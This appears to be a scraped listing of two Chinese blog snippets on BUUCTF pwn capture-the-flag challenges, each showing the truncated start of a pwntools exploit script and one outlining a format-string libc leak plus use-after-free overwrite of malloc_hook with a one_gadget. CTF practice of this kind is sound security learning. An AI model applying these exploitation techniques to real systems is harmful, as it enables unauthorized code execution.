buuctf+gyctf+2020+force

2025-02-03 16:24:40

拼音 [ 拼音 ]

BUUCTF-pwn(12) - 望权栈 - 博客园

context(log_level='debug',os='linux',arch='amd64') binary ='./gyctf_2020_force'r = remote('node4.buuoj.cn',29838)#r = process(binary)elf = ELF(binary) libc = ELF('./libc-2.23.so')defAllocate(size=0x18,payload='\n'): r.sendlineafter("2:puts\n",'1') r.sendlineafter("...
BUUCTF-pwn(15) - 望权栈 - 博客园

全保护开启,故我们利用格式化字符串漏洞泄露libc地址,从而得到malloc_hook地址。然后利用UAF漏洞修改malloc_hook为one_gadget,此时进行申请操作便可获取权限! frompwnimport* context(log_level='debug',os='linux',arch='amd64') binary ='./gyctf_2020_some_thing_interesting'r = remote('node4.buuoj.cn',2...